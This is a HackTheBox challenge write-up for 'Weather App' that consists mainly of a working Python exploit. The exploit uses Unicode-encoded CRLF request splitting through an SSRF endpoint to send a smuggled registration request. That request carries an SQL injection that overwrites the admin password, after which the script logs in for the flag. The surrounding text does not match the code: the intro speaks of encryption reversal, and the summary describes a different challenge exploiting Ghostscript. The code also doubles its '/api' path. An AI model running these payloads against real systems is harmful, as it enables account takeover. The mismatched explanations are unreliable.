Post

HackTheBox Weather App Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Weather App Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

import sys
import requests

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}/api"

def encode_special_chars(value):
    return value.replace(" ", "\u0120").replace("'", "\u0127").replace('"', "\u0122")

BASE_URL = get_base_url()

url = f'{BASE_URL}/api/weather'
host = "127.0.0.1"
username = 'admin'
password = "111') ON CONFLICT (username) DO UPDATE SET password='1234';--"
parsed_username = encode_special_chars(username)
parsed_password = encode_special_chars(password)
content_length = len(parsed_username) + len(parsed_password) + len("username=&password=")
endpoint = (
    f"{host}/\u0120HTTP/1.1\u010D\u010A"
    f"HOST:\u0120{host}\u010D\u010A"
    f"Content-Length:\u01200\u010D\u010A\u010D\u010A"
    f"POST\u0120/register\u0120HTTP/1.1\u010D\u010A"
    f"HOST:\u0120{host}\u010D\u010A"
    f"Content-Type:\u0120application/x-www-form-urlencoded\u010D\u010A"
    f"Content-Length:\u0120{content_length}\u010D\u010A\u010D\u010A"
    f"username={parsed_username}&password={parsed_password}\u010D\u010A\u010D\u010A"
    f"GET\u0120"
)
data = {
    "endpoint": endpoint,
    "city": "MyCity",
    "country": "MyCountryCode"
}
response = requests.post(url, json=data)
print("SSRF Exploit Response:")
print(response.text)
login_url = f'{BASE_URL}/login'
login_data = {
    "username": "admin",
    "password": "1234"
}
flag_response = requests.post(login_url, data=login_data)
print("Flag Retrieval Response:")
print(flag_response.text)

Summary

PetPet Rcbee leverages a vulnerability in Ghostscript 9.23 to execute arbitrary commands through a crafted PostScript payload. The exploit is uploaded via an API, enabling the attacker to copy the flag to a publicly accessible directory for retrieval.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.